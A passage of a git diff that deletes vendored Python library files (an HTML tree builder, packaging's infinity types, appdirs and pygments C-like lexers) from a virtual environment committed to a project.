pylint:disable=not-callable - - # Document class - documentClass = None - - # The class to use for creating a node - elementClass = None - - # The class to use for creating comments - commentClass = None - - # The class to use for creating doctypes - doctypeClass = None - - # Fragment class - fragmentClass = None - - def __init__(self, namespaceHTMLElements): - """Create a TreeBuilder - - :arg namespaceHTMLElements: whether or not to namespace HTML elements - - """ - if namespaceHTMLElements: - self.defaultNamespace = "http://www.w3.org/1999/xhtml" - else: - self.defaultNamespace = None - self.reset() - - def reset(self): - self.openElements = [] - self.activeFormattingElements = ActiveFormattingElements() - - # XXX - rename these to headElement, formElement - self.headPointer = None - self.formPointer = None - - self.insertFromTable = False - - self.document = self.documentClass() - - def elementInScope(self, target, variant=None): - - # If we pass a node in we match that. if we pass a string - # match any node with that name - exactNode = hasattr(target, "nameTuple") - if not exactNode: - if isinstance(target, text_type): - target = (namespaces["html"], target) - assert isinstance(target, tuple) - - listElements, invert = listElementsMap[variant] - - for node in reversed(self.openElements): - if exactNode and node == target: - return True - elif not exactNode and node.nameTuple == target: - return True - elif (invert ^ (node.nameTuple in listElements)): - return False - - assert False # We should never reach this point - - def reconstructActiveFormattingElements(self): - # Within this algorithm the order of steps described in the - # specification is not quite the same as the order of steps in the - # code. It should still do the same though. - - # Step 1: stop the algorithm when there's nothing to do. - if not self.activeFormattingElements: - return - - # Step 2 and step 3: we start with the last element. So i is -1. - i = len(self.activeFormattingElements) - 1 - entry = self.activeFormattingElements[i] - if entry == Marker or entry in self.openElements: - return - - # Step 6 - while entry != Marker and entry not in self.openElements: - if i == 0: - # This will be reset to 0 below - i = -1 - break - i -= 1 - # Step 5: let entry be one earlier in the list. - entry = self.activeFormattingElements[i] - - while True: - # Step 7 - i += 1 - - # Step 8 - entry = self.activeFormattingElements[i] - clone = entry.cloneNode() # Mainly to get a new copy of the attributes - - # Step 9 - element = self.insertElement({"type": "StartTag", - "name": clone.name, - "namespace": clone.namespace, - "data": clone.attributes}) - - # Step 10 - self.activeFormattingElements[i] = element - - # Step 11 - if element == self.activeFormattingElements[-1]: - break - - def clearActiveFormattingElements(self): - entry = self.activeFormattingElements.pop() - while self.activeFormattingElements and entry != Marker: - entry = self.activeFormattingElements.pop() - - def elementInActiveFormattingElements(self, name): - """Check if an element exists between the end of the active - formatting elements and the last marker. If it does, return it, else - return false""" - - for item in self.activeFormattingElements[::-1]: - # Check for Marker first because if it's a Marker it doesn't have a - # name attribute. - if item == Marker: - break - elif item.name == name: - return item - return False - - def insertRoot(self, token): - element = self.createElement(token) - self.openElements.append(element) - self.document.appendChild(element) - - def insertDoctype(self, token): - name = token["name"] - publicId = token["publicId"] - systemId = token["systemId"] - - doctype = self.doctypeClass(name, publicId, systemId) - self.document.appendChild(doctype) - - def insertComment(self, token, parent=None): - if parent is None: - parent = self.openElements[-1] - parent.appendChild(self.commentClass(token["data"])) - - def createElement(self, token): - """Create an element but don't insert it anywhere""" - name = token["name"] - namespace = token.get("namespace", self.defaultNamespace) - element = self.elementClass(name, namespace) - element.attributes = token["data"] - return element - - def _getInsertFromTable(self): - return self._insertFromTable - - def _setInsertFromTable(self, value): - """Switch the function used to insert an element from the - normal one to the misnested table one and back again""" - self._insertFromTable = value - if value: - self.insertElement = self.insertElementTable - else: - self.insertElement = self.insertElementNormal - - insertFromTable = property(_getInsertFromTable, _setInsertFromTable) - - def insertElementNormal(self, token): - name = token["name"] - assert isinstance(name, text_type), "Element %s not unicode" % name - namespace = token.get("namespace", self.defaultNamespace) - element = self.elementClass(name, namespace) - element.attributes = token["data"] - self.openElements[-1].appendChild(element) - self.openElements.append(element) - return element - - def insertElementTable(self, token): - """Create an element and insert it into the tree""" - element = self.createElement(token) - if self.openElements[-1].name not in tableInsertModeElements: - return self.insertElementNormal(token) - else: - # We should be in the InTable mode. This means we want to do - # special magic element rearranging - parent, insertBefore = self.getTableMisnestedNodePosition() - if insertBefore is None: - parent.appendChild(element) - else: - parent.insertBefore(element, insertBefore) - self.openElements.append(element) - return element - - def insertText(self, data, parent=None): - """Insert text data.""" - if parent is None: - parent = self.openElements[-1] - - if (not self.insertFromTable or (self.insertFromTable and - self.openElements[-1].name - not in tableInsertModeElements)): - parent.insertText(data) - else: - # We should be in the InTable mode. This means we want to do - # special magic element rearranging - parent, insertBefore = self.getTableMisnestedNodePosition() - parent.insertText(data, insertBefore) - - def getTableMisnestedNodePosition(self): - """Get the foster parent element, and sibling to insert before - (or None) when inserting a misnested table node""" - # The foster parent element is the one which comes before the most - # recently opened table element - # XXX - this is really inelegant - lastTable = None - fosterParent = None - insertBefore = None - for elm in self.openElements[::-1]: - if elm.name == "table": - lastTable = elm - break - if lastTable: - # XXX - we should really check that this parent is actually a - # node here - if lastTable.parent: - fosterParent = lastTable.parent - insertBefore = lastTable - else: - fosterParent = self.openElements[ - self.openElements.index(lastTable) - 1] - else: - fosterParent = self.openElements[0] - return fosterParent, insertBefore - - def generateImpliedEndTags(self, exclude=None): - name = self.openElements[-1].name - # XXX td, th and tr are not actually needed - if (name in frozenset(("dd", "dt", "li", "option", "optgroup", "p", "rp", "rt")) and - name != exclude): - self.openElements.pop() - # XXX This is not entirely what the specification says. We should - # investigate it more closely. - self.generateImpliedEndTags(exclude) - - def getDocument(self): - """Return the final tree""" - return self.document - - def getFragment(self): - """Return the final fragment""" - # assert self.innerHTML - fragment = self.fragmentClass() - self.openElements[0].reparentChildren(fragment) - return fragment - - def testSerializer(self, node): - """Serialize the subtree of node in the format required by unit tests - - :arg node: the node from which to start serializing - - """ - raise NotImplementedError diff --git a/spaces/profayle/TerrapinTalk/myenv/lib/python3.9/site-packages/pip/_vendor/packaging/_structures.py b/spaces/profayle/TerrapinTalk/myenv/lib/python3.9/site-packages/pip/_vendor/packaging/_structures.py deleted file mode 100644 index 90a6465f9682c886363eea5327dac64bf623a6ff..0000000000000000000000000000000000000000 --- a/spaces/profayle/TerrapinTalk/myenv/lib/python3.9/site-packages/pip/_vendor/packaging/_structures.py +++ /dev/null @@ -1,61 +0,0 @@ -# This file is dual licensed under the terms of the Apache License, Version -# 2.0, and the BSD License. See the LICENSE file in the root of this repository -# for complete details. - - -class InfinityType: - def __repr__(self) -> str: - return "Infinity" - - def __hash__(self) -> int: - return hash(repr(self)) - - def __lt__(self, other: object) -> bool: - return False - - def __le__(self, other: object) -> bool: - return False - - def __eq__(self, other: object) -> bool: - return isinstance(other, self.__class__) - - def __gt__(self, other: object) -> bool: - return True - - def __ge__(self, other: object) -> bool: - return True - - def __neg__(self: object) -> "NegativeInfinityType": - return NegativeInfinity - - -Infinity = InfinityType() - - -class NegativeInfinityType: - def __repr__(self) -> str: - return "-Infinity" - - def __hash__(self) -> int: - return hash(repr(self)) - - def __lt__(self, other: object) -> bool: - return True - - def __le__(self, other: object) -> bool: - return True - - def __eq__(self, other: object) -> bool: - return isinstance(other, self.__class__) - - def __gt__(self, other: object) -> bool: - return False - - def __ge__(self, other: object) -> bool: - return False - - def __neg__(self: object) -> InfinityType: - return Infinity - - -NegativeInfinity = NegativeInfinityType() diff --git a/spaces/profayle/TerrapinTalk/myenv/lib/python3.9/site-packages/pkg_resources/_vendor/appdirs.py b/spaces/profayle/TerrapinTalk/myenv/lib/python3.9/site-packages/pkg_resources/_vendor/appdirs.py deleted file mode 100644 index ae67001af8b661373edeee2eb327b9f63e630d62..0000000000000000000000000000000000000000 --- a/spaces/profayle/TerrapinTalk/myenv/lib/python3.9/site-packages/pkg_resources/_vendor/appdirs.py +++ /dev/null @@ -1,608 +0,0 @@ -#!/usr/bin/env python -# -*- coding: utf-8 -*- -# Copyright (c) 2005-2010 ActiveState Software Inc. -# Copyright (c) 2013 Eddy Petrișor - -"""Utilities for determining application-specific dirs. - -See for details and usage. -""" -# Dev Notes: -# - MSDN on where to store app data files: -# http://support.microsoft.com/default.aspx?scid=kb;en-us;310294#XSLTH3194121123120121120120 -# - Mac OS X: http://developer.apple.com/documentation/MacOSX/Conceptual/BPFileSystem/index.html -# - XDG spec for Un*x: http://standards.freedesktop.org/basedir-spec/basedir-spec-latest.html - -__version_info__ = (1, 4, 3) -__version__ = '.'.join(map(str, __version_info__)) - - -import sys -import os - -PY3 = sys.version_info[0] == 3 - -if PY3: - unicode = str - -if sys.platform.startswith('java'): - import platform - os_name = platform.java_ver()[3][0] - if os_name.startswith('Windows'): # "Windows XP", "Windows 7", etc. - system = 'win32' - elif os_name.startswith('Mac'): # "Mac OS X", etc. - system = 'darwin' - else: # "Linux", "SunOS", "FreeBSD", etc. - # Setting this to "linux2" is not ideal, but only Windows or Mac - # are actually checked for and the rest of the module expects - # *sys.platform* style strings. - system = 'linux2' -else: - system = sys.platform - - - -def user_data_dir(appname=None, appauthor=None, version=None, roaming=False): - r"""Return full path to the user-specific data dir for this application. - - "appname" is the name of application. - If None, just the system directory is returned. - "appauthor" (only used on Windows) is the name of the - appauthor or distributing body for this application. Typically - it is the owning company name. This falls back to appname. You may - pass False to disable it. - "version" is an optional version path element to append to the - path. You might want to use this if you want multiple versions - of your app to be able to run independently. If used, this - would typically be ".". - Only applied when appname is present. - "roaming" (boolean, default False) can be set True to use the Windows - roaming appdata directory. That means that for users on a Windows - network setup for roaming profiles, this user data will be - sync'd on login. See - - for a discussion of issues. - - Typical user data directories are: - Mac OS X: ~/Library/Application Support/ - Unix: ~/.local/share/ # or in $XDG_DATA_HOME, if defined - Win XP (not roaming): C:\Documents and Settings\\Application Data\\ - Win XP (roaming): C:\Documents and Settings\\Local Settings\Application Data\\ - Win 7 (not roaming): C:\Users\\AppData\Local\\ - Win 7 (roaming): C:\Users\\AppData\Roaming\\ - - For Unix, we follow the XDG spec and support $XDG_DATA_HOME. - That means, by default "~/.local/share/". - """ - if system == "win32": - if appauthor is None: - appauthor = appname - const = roaming and "CSIDL_APPDATA" or "CSIDL_LOCAL_APPDATA" - path = os.path.normpath(_get_win_folder(const)) - if appname: - if appauthor is not False: - path = os.path.join(path, appauthor, appname) - else: - path = os.path.join(path, appname) - elif system == 'darwin': - path = os.path.expanduser('~/Library/Application Support/') - if appname: - path = os.path.join(path, appname) - else: - path = os.getenv('XDG_DATA_HOME', os.path.expanduser("~/.local/share")) - if appname: - path = os.path.join(path, appname) - if appname and version: - path = os.path.join(path, version) - return path - - -def site_data_dir(appname=None, appauthor=None, version=None, multipath=False): - r"""Return full path to the user-shared data dir for this application. - - "appname" is the name of application. - If None, just the system directory is returned. - "appauthor" (only used on Windows) is the name of the - appauthor or distributing body for this application. Typically - it is the owning company name. This falls back to appname. You may - pass False to disable it. - "version" is an optional version path element to append to the - path. You might want to use this if you want multiple versions - of your app to be able to run independently. If used, this - would typically be ".". - Only applied when appname is present. - "multipath" is an optional parameter only applicable to *nix - which indicates that the entire list of data dirs should be - returned. By default, the first item from XDG_DATA_DIRS is - returned, or '/usr/local/share/', - if XDG_DATA_DIRS is not set - - Typical site data directories are: - Mac OS X: /Library/Application Support/ - Unix: /usr/local/share/ or /usr/share/ - Win XP: C:\Documents and Settings\All Users\Application Data\\ - Vista: (Fail! "C:\ProgramData" is a hidden *system* directory on Vista.) - Win 7: C:\ProgramData\\ # Hidden, but writeable on Win 7. - - For Unix, this is using the $XDG_DATA_DIRS[0] default. - - WARNING: Do not use this on Windows. See the Vista-Fail note above for why. - """ - if system == "win32": - if appauthor is None: - appauthor = appname - path = os.path.normpath(_get_win_folder("CSIDL_COMMON_APPDATA")) - if appname: - if appauthor is not False: - path = os.path.join(path, appauthor, appname) - else: - path = os.path.join(path, appname) - elif system == 'darwin': - path = os.path.expanduser('/Library/Application Support') - if appname: - path = os.path.join(path, appname) - else: - # XDG default for $XDG_DATA_DIRS - # only first, if multipath is False - path = os.getenv('XDG_DATA_DIRS', - os.pathsep.join(['/usr/local/share', '/usr/share'])) - pathlist = [os.path.expanduser(x.rstrip(os.sep)) for x in path.split(os.pathsep)] - if appname: - if version: - appname = os.path.join(appname, version) - pathlist = [os.sep.join([x, appname]) for x in pathlist] - - if multipath: - path = os.pathsep.join(pathlist) - else: - path = pathlist[0] - return path - - if appname and version: - path = os.path.join(path, version) - return path - - -def user_config_dir(appname=None, appauthor=None, version=None, roaming=False): - r"""Return full path to the user-specific config dir for this application. - - "appname" is the name of application. - If None, just the system directory is returned. - "appauthor" (only used on Windows) is the name of the - appauthor or distributing body for this application. Typically - it is the owning company name. This falls back to appname. You may - pass False to disable it. - "version" is an optional version path element to append to the - path. You might want to use this if you want multiple versions - of your app to be able to run independently. If used, this - would typically be ".". - Only applied when appname is present. - "roaming" (boolean, default False) can be set True to use the Windows - roaming appdata directory. That means that for users on a Windows - network setup for roaming profiles, this user data will be - sync'd on login. See - - for a discussion of issues. - - Typical user config directories are: - Mac OS X: same as user_data_dir - Unix: ~/.config/ # or in $XDG_CONFIG_HOME, if defined - Win *: same as user_data_dir - - For Unix, we follow the XDG spec and support $XDG_CONFIG_HOME. - That means, by default "~/.config/". - """ - if system in ["win32", "darwin"]: - path = user_data_dir(appname, appauthor, None, roaming) - else: - path = os.getenv('XDG_CONFIG_HOME', os.path.expanduser("~/.config")) - if appname: - path = os.path.join(path, appname) - if appname and version: - path = os.path.join(path, version) - return path - - -def site_config_dir(appname=None, appauthor=None, version=None, multipath=False): - r"""Return full path to the user-shared data dir for this application. - - "appname" is the name of application. - If None, just the system directory is returned. - "appauthor" (only used on Windows) is the name of the - appauthor or distributing body for this application. Typically - it is the owning company name. This falls back to appname. You may - pass False to disable it. - "version" is an optional version path element to append to the - path. You might want to use this if you want multiple versions - of your app to be able to run independently. If used, this - would typically be ".". - Only applied when appname is present. - "multipath" is an optional parameter only applicable to *nix - which indicates that the entire list of config dirs should be - returned. By default, the first item from XDG_CONFIG_DIRS is - returned, or '/etc/xdg/', if XDG_CONFIG_DIRS is not set - - Typical site config directories are: - Mac OS X: same as site_data_dir - Unix: /etc/xdg/ or $XDG_CONFIG_DIRS[i]/ for each value in - $XDG_CONFIG_DIRS - Win *: same as site_data_dir - Vista: (Fail! "C:\ProgramData" is a hidden *system* directory on Vista.) - - For Unix, this is using the $XDG_CONFIG_DIRS[0] default, if multipath=False - - WARNING: Do not use this on Windows. See the Vista-Fail note above for why. - """ - if system in ["win32", "darwin"]: - path = site_data_dir(appname, appauthor) - if appname and version: - path = os.path.join(path, version) - else: - # XDG default for $XDG_CONFIG_DIRS - # only first, if multipath is False - path = os.getenv('XDG_CONFIG_DIRS', '/etc/xdg') - pathlist = [os.path.expanduser(x.rstrip(os.sep)) for x in path.split(os.pathsep)] - if appname: - if version: - appname = os.path.join(appname, version) - pathlist = [os.sep.join([x, appname]) for x in pathlist] - - if multipath: - path = os.pathsep.join(pathlist) - else: - path = pathlist[0] - return path - - -def user_cache_dir(appname=None, appauthor=None, version=None, opinion=True): - r"""Return full path to the user-specific cache dir for this application. - - "appname" is the name of application. - If None, just the system directory is returned. - "appauthor" (only used on Windows) is the name of the - appauthor or distributing body for this application. Typically - it is the owning company name. This falls back to appname. You may - pass False to disable it. - "version" is an optional version path element to append to the - path. You might want to use this if you want multiple versions - of your app to be able to run independently. If used, this - would typically be ".". - Only applied when appname is present. - "opinion" (boolean) can be False to disable the appending of - "Cache" to the base app data dir for Windows. See - discussion below. - - Typical user cache directories are: - Mac OS X: ~/Library/Caches/ - Unix: ~/.cache/ (XDG default) - Win XP: C:\Documents and Settings\\Local Settings\Application Data\\\Cache - Vista: C:\Users\\AppData\Local\\\Cache - - On Windows the only suggestion in the MSDN docs is that local settings go in - the `CSIDL_LOCAL_APPDATA` directory. This is identical to the non-roaming - app data dir (the default returned by `user_data_dir` above). Apps typically - put cache data somewhere *under* the given dir here. Some examples: - ...\Mozilla\Firefox\Profiles\\Cache - ...\Acme\SuperApp\Cache\1.0 - OPINION: This function appends "Cache" to the `CSIDL_LOCAL_APPDATA` value. - This can be disabled with the `opinion=False` option. - """ - if system == "win32": - if appauthor is None: - appauthor = appname - path = os.path.normpath(_get_win_folder("CSIDL_LOCAL_APPDATA")) - if appname: - if appauthor is not False: - path = os.path.join(path, appauthor, appname) - else: - path = os.path.join(path, appname) - if opinion: - path = os.path.join(path, "Cache") - elif system == 'darwin': - path = os.path.expanduser('~/Library/Caches') - if appname: - path = os.path.join(path, appname) - else: - path = os.getenv('XDG_CACHE_HOME', os.path.expanduser('~/.cache')) - if appname: - path = os.path.join(path, appname) - if appname and version: - path = os.path.join(path, version) - return path - - -def user_state_dir(appname=None, appauthor=None, version=None, roaming=False): - r"""Return full path to the user-specific state dir for this application. - - "appname" is the name of application. - If None, just the system directory is returned. - "appauthor" (only used on Windows) is the name of the - appauthor or distributing body for this application. Typically - it is the owning company name. This falls back to appname. You may - pass False to disable it. - "version" is an optional version path element to append to the - path. You might want to use this if you want multiple versions - of your app to be able to run independently. If used, this - would typically be ".". - Only applied when appname is present. - "roaming" (boolean, default False) can be set True to use the Windows - roaming appdata directory. That means that for users on a Windows - network setup for roaming profiles, this user data will be - sync'd on login. See - - for a discussion of issues. - - Typical user state directories are: - Mac OS X: same as user_data_dir - Unix: ~/.local/state/ # or in $XDG_STATE_HOME, if defined - Win *: same as user_data_dir - - For Unix, we follow this Debian proposal - to extend the XDG spec and support $XDG_STATE_HOME. - - That means, by default "~/.local/state/". - """ - if system in ["win32", "darwin"]: - path = user_data_dir(appname, appauthor, None, roaming) - else: - path = os.getenv('XDG_STATE_HOME', os.path.expanduser("~/.local/state")) - if appname: - path = os.path.join(path, appname) - if appname and version: - path = os.path.join(path, version) - return path - - -def user_log_dir(appname=None, appauthor=None, version=None, opinion=True): - r"""Return full path to the user-specific log dir for this application. - - "appname" is the name of application. - If None, just the system directory is returned. - "appauthor" (only used on Windows) is the name of the - appauthor or distributing body for this application. Typically - it is the owning company name. This falls back to appname. You may - pass False to disable it. - "version" is an optional version path element to append to the - path. You might want to use this if you want multiple versions - of your app to be able to run independently. If used, this - would typically be ".". - Only applied when appname is present. - "opinion" (boolean) can be False to disable the appending of - "Logs" to the base app data dir for Windows, and "log" to the - base cache dir for Unix. See discussion below. - - Typical user log directories are: - Mac OS X: ~/Library/Logs/ - Unix: ~/.cache//log # or under $XDG_CACHE_HOME if defined - Win XP: C:\Documents and Settings\\Local Settings\Application Data\\\Logs - Vista: C:\Users\\AppData\Local\\\Logs - - On Windows the only suggestion in the MSDN docs is that local settings - go in the `CSIDL_LOCAL_APPDATA` directory. (Note: I'm interested in - examples of what some windows apps use for a logs dir.) - - OPINION: This function appends "Logs" to the `CSIDL_LOCAL_APPDATA` - value for Windows and appends "log" to the user cache dir for Unix. - This can be disabled with the `opinion=False` option. - """ - if system == "darwin": - path = os.path.join( - os.path.expanduser('~/Library/Logs'), - appname) - elif system == "win32": - path = user_data_dir(appname, appauthor, version) - version = False - if opinion: - path = os.path.join(path, "Logs") - else: - path = user_cache_dir(appname, appauthor, version) - version = False - if opinion: - path = os.path.join(path, "log") - if appname and version: - path = os.path.join(path, version) - return path - - -class AppDirs(object): - """Convenience wrapper for getting application dirs.""" - def __init__(self, appname=None, appauthor=None, version=None, - roaming=False, multipath=False): - self.appname = appname - self.appauthor = appauthor - self.version = version - self.roaming = roaming - self.multipath = multipath - - @property - def user_data_dir(self): - return user_data_dir(self.appname, self.appauthor, - version=self.version, roaming=self.roaming) - - @property - def site_data_dir(self): - return site_data_dir(self.appname, self.appauthor, - version=self.version, multipath=self.multipath) - - @property - def user_config_dir(self): - return user_config_dir(self.appname, self.appauthor, - version=self.version, roaming=self.roaming) - - @property - def site_config_dir(self): - return site_config_dir(self.appname, self.appauthor, - version=self.version, multipath=self.multipath) - - @property - def user_cache_dir(self): - return user_cache_dir(self.appname, self.appauthor, - version=self.version) - - @property - def user_state_dir(self): - return user_state_dir(self.appname, self.appauthor, - version=self.version) - - @property - def user_log_dir(self): - return user_log_dir(self.appname, self.appauthor, - version=self.version) - - -#---- internal support stuff - -def _get_win_folder_from_registry(csidl_name): - """This is a fallback technique at best. I'm not sure if using the - registry for this guarantees us the correct answer for all CSIDL_* - names. - """ - if PY3: - import winreg as _winreg - else: - import _winreg - - shell_folder_name = { - "CSIDL_APPDATA": "AppData", - "CSIDL_COMMON_APPDATA": "Common AppData", - "CSIDL_LOCAL_APPDATA": "Local AppData", - }[csidl_name] - - key = _winreg.OpenKey( - _winreg.HKEY_CURRENT_USER, - r"Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders" - ) - dir, type = _winreg.QueryValueEx(key, shell_folder_name) - return dir - - -def _get_win_folder_with_pywin32(csidl_name): - from win32com.shell import shellcon, shell - dir = shell.SHGetFolderPath(0, getattr(shellcon, csidl_name), 0, 0) - # Try to make this a unicode path because SHGetFolderPath does - # not return unicode strings when there is unicode data in the - # path. - try: - dir = unicode(dir) - - # Downgrade to short path name if have highbit chars. See - # . - has_high_char = False - for c in dir: - if ord(c) > 255: - has_high_char = True - break - if has_high_char: - try: - import win32api - dir = win32api.GetShortPathName(dir) - except ImportError: - pass - except UnicodeError: - pass - return dir - - -def _get_win_folder_with_ctypes(csidl_name): - import ctypes - - csidl_const = { - "CSIDL_APPDATA": 26, - "CSIDL_COMMON_APPDATA": 35, - "CSIDL_LOCAL_APPDATA": 28, - }[csidl_name] - - buf = ctypes.create_unicode_buffer(1024) - ctypes.windll.shell32.SHGetFolderPathW(None, csidl_const, None, 0, buf) - - # Downgrade to short path name if have highbit chars. See - # . - has_high_char = False - for c in buf: - if ord(c) > 255: - has_high_char = True - break - if has_high_char: - buf2 = ctypes.create_unicode_buffer(1024) - if ctypes.windll.kernel32.GetShortPathNameW(buf.value, buf2, 1024): - buf = buf2 - - return buf.value - -def _get_win_folder_with_jna(csidl_name): - import array - from com.sun import jna - from com.sun.jna.platform import win32 - - buf_size = win32.WinDef.MAX_PATH * 2 - buf = array.zeros('c', buf_size) - shell = win32.Shell32.INSTANCE - shell.SHGetFolderPath(None, getattr(win32.ShlObj, csidl_name), None, win32.ShlObj.SHGFP_TYPE_CURRENT, buf) - dir = jna.Native.toString(buf.tostring()).rstrip("\0") - - # Downgrade to short path name if have highbit chars. See - # . - has_high_char = False - for c in dir: - if ord(c) > 255: - has_high_char = True - break - if has_high_char: - buf = array.zeros('c', buf_size) - kernel = win32.Kernel32.INSTANCE - if kernel.GetShortPathName(dir, buf, buf_size): - dir = jna.Native.toString(buf.tostring()).rstrip("\0") - - return dir - -if system == "win32": - try: - import win32com.shell - _get_win_folder = _get_win_folder_with_pywin32 - except ImportError: - try: - from ctypes import windll - _get_win_folder = _get_win_folder_with_ctypes - except ImportError: - try: - import com.sun.jna - _get_win_folder = _get_win_folder_with_jna - except ImportError: - _get_win_folder = _get_win_folder_from_registry - - -#---- self test code - -if __name__ == "__main__": - appname = "MyApp" - appauthor = "MyCompany" - - props = ("user_data_dir", - "user_config_dir", - "user_cache_dir", - "user_state_dir", - "user_log_dir", - "site_data_dir", - "site_config_dir") - - print("-- app dirs %s --" % __version__) - - print("-- app dirs (with optional 'version')") - dirs = AppDirs(appname, appauthor, version="1.0") - for prop in props: - print("%s: %s" % (prop, getattr(dirs, prop))) - - print("\n-- app dirs (without optional 'version')") - dirs = AppDirs(appname, appauthor) - for prop in props: - print("%s: %s" % (prop, getattr(dirs, prop))) - - print("\n-- app dirs (without optional 'appauthor')") - dirs = AppDirs(appname) - for prop in props: - print("%s: %s" % (prop, getattr(dirs, prop))) - - print("\n-- app dirs (with disabled 'appauthor')") - dirs = AppDirs(appname, appauthor=False) - for prop in props: - print("%s: %s" % (prop, getattr(dirs, prop))) diff --git a/spaces/profayle/TerrapinTalk/myenv/lib/python3.9/site-packages/pygments/lexers/c_like.py b/spaces/profayle/TerrapinTalk/myenv/lib/python3.9/site-packages/pygments/lexers/c_like.py deleted file mode 100644 index a7379c9bb2a45903db589d13e36f6dc21548a37d..0000000000000000000000000000000000000000 --- a/spaces/profayle/TerrapinTalk/myenv/lib/python3.9/site-packages/pygments/lexers/c_like.py +++ /dev/null @@ -1,666 +0,0 @@ -""" - pygments.lexers.c_like - ~~~~~~~~~~~~~~~~~~~~~~ - - Lexers for other C-like languages. - - :copyright: Copyright 2006-2023 by the Pygments team, see AUTHORS. - :license: BSD, see LICENSE for details. -""" - -import re - -from pygments.lexer import RegexLexer, include, bygroups, inherit, words, \ - default -from pygments.token import Text, Comment, Operator, Keyword, Name, String, \ - Number, Punctuation, Whitespace - -from pygments.lexers.c_cpp import CLexer, CppLexer -from pygments.lexers import _mql_builtins - -__all__ = ['PikeLexer', 'NesCLexer', 'ClayLexer', 'ECLexer', 'ValaLexer', - 'CudaLexer', 'SwigLexer', 'MqlLexer', 'ArduinoLexer', 'CharmciLexer', - 'OmgIdlLexer'] - - -class PikeLexer(CppLexer): - """ - For `Pike `_ source code. - - .. versionadded:: 2.0 - """ - name = 'Pike' - aliases = ['pike'] - filenames = ['*.pike', '*.pmod'] - mimetypes = ['text/x-pike'] - - tokens = { - 'statements': [ - (words(( - 'catch', 'new', 'private', 'protected', 'public', 'gauge', - 'throw', 'throws', 'class', 'interface', 'implement', 'abstract', - 'extends', 'from', 'this', 'super', 'constant', 'final', 'static', - 'import', 'use', 'extern', 'inline', 'proto', 'break', 'continue', - 'if', 'else', 'for', 'while', 'do', 'switch', 'case', 'as', 'in', - 'version', 'return', 'true', 'false', 'null', - '__VERSION__', '__MAJOR__', '__MINOR__', '__BUILD__', '__REAL_VERSION__', - '__REAL_MAJOR__', '__REAL_MINOR__', '__REAL_BUILD__', '__DATE__', '__TIME__', - '__FILE__', '__DIR__', '__LINE__', '__AUTO_BIGNUM__', '__NT__', '__PIKE__', - '__amigaos__', '_Pragma', 'static_assert', 'defined', 'sscanf'), suffix=r'\b'), - Keyword), - (r'(bool|int|long|float|short|double|char|string|object|void|mapping|' - r'array|multiset|program|function|lambda|mixed|' - r'[a-z_][a-z0-9_]*_t)\b', - Keyword.Type), - (r'(class)(\s+)', bygroups(Keyword, Whitespace), 'classname'), - (r'[~!%^&*+=|?:<>/@-]', Operator), - inherit, - ], - 'classname': [ - (r'[a-zA-Z_]\w*', Name.Class, '#pop'), - # template specification - (r'\s*(?=>)', Whitespace, '#pop'), - ], - } - - -class NesCLexer(CLexer): - """ - For `nesC `_ source code with preprocessor - directives. - - .. versionadded:: 2.0 - """ - name = 'nesC' - aliases = ['nesc'] - filenames = ['*.nc'] - mimetypes = ['text/x-nescsrc'] - - tokens = { - 'statements': [ - (words(( - 'abstract', 'as', 'async', 'atomic', 'call', 'command', 'component', - 'components', 'configuration', 'event', 'extends', 'generic', - 'implementation', 'includes', 'interface', 'module', 'new', 'norace', - 'post', 'provides', 'signal', 'task', 'uses'), suffix=r'\b'), - Keyword), - (words(('nx_struct', 'nx_union', 'nx_int8_t', 'nx_int16_t', 'nx_int32_t', - 'nx_int64_t', 'nx_uint8_t', 'nx_uint16_t', 'nx_uint32_t', - 'nx_uint64_t'), suffix=r'\b'), - Keyword.Type), - inherit, - ], - } - - -class ClayLexer(RegexLexer): - """ - For `Clay `_ source. - - .. versionadded:: 2.0 - """ - name = 'Clay' - filenames = ['*.clay'] - aliases = ['clay'] - mimetypes = ['text/x-clay'] - tokens = { - 'root': [ - (r'\s+', Whitespace), - (r'//.*?$', Comment.Single), - (r'/(\\\n)?[*](.|\n)*?[*](\\\n)?/', Comment.Multiline), - (r'\b(public|private|import|as|record|variant|instance' - r'|define|overload|default|external|alias' - r'|rvalue|ref|forward|inline|noinline|forceinline' - r'|enum|var|and|or|not|if|else|goto|return|while' - r'|switch|case|break|continue|for|in|true|false|try|catch|throw' - r'|finally|onerror|staticassert|eval|when|newtype' - r'|__FILE__|__LINE__|__COLUMN__|__ARG__' - r')\b', Keyword), - (r'[~!%^&*+=|:<>/-]', Operator), - (r'[#(){}\[\],;.]', Punctuation), - (r'0x[0-9a-fA-F]+[LlUu]*', Number.Hex), - (r'\d+[LlUu]*', Number.Integer), - (r'\b(true|false)\b', Name.Builtin), - (r'(?i)[a-z_?][\w?]*', Name), - (r'"""', String, 'tdqs'), - (r'"', String, 'dqs'), - ], - 'strings': [ - (r'(?i)\\(x[0-9a-f]{2}|.)', String.Escape), - (r'[^\\"]+', String), - ], - 'nl': [ - (r'\n', String), - ], - 'dqs': [ - (r'"', String, '#pop'), - include('strings'), - ], - 'tdqs': [ - (r'"""', String, '#pop'), - include('strings'), - include('nl'), - ], - } - - -class ECLexer(CLexer): - """ - For eC source code with preprocessor directives. - - .. versionadded:: 1.5 - """ - name = 'eC' - aliases = ['ec'] - filenames = ['*.ec', '*.eh'] - mimetypes = ['text/x-echdr', 'text/x-ecsrc'] - - tokens = { - 'statements': [ - (words(( - 'virtual', 'class', 'private', 'public', 'property', 'import', - 'delete', 'new', 'new0', 'renew', 'renew0', 'define', 'get', - 'set', 'remote', 'dllexport', 'dllimport', 'stdcall', 'subclass', - '__on_register_module', 'namespace', 'using', 'typed_object', - 'any_object', 'incref', 'register', 'watch', 'stopwatching', 'firewatchers', - 'watchable', 'class_designer', 'class_fixed', 'class_no_expansion', 'isset', - 'class_default_property', 'property_category', 'class_data', - 'class_property', 'thisclass', 'dbtable', 'dbindex', - 'database_open', 'dbfield'), suffix=r'\b'), Keyword), - (words(('uint', 'uint16', 'uint32', 'uint64', 'bool', 'byte', - 'unichar', 'int64'), suffix=r'\b'), - Keyword.Type), - (r'(class)(\s+)', bygroups(Keyword, Whitespace), 'classname'), - (r'(null|value|this)\b', Name.Builtin), - inherit, - ] - } - - -class ValaLexer(RegexLexer): - """ - For Vala source code with preprocessor directives. - - .. versionadded:: 1.1 - """ - name = 'Vala' - aliases = ['vala', 'vapi'] - filenames = ['*.vala', '*.vapi'] - mimetypes = ['text/x-vala'] - - tokens = { - 'whitespace': [ - (r'^\s*#if\s+0', Comment.Preproc, 'if0'), - (r'\n', Whitespace), - (r'\s+', Whitespace), - (r'\\\n', Text), # line continuation 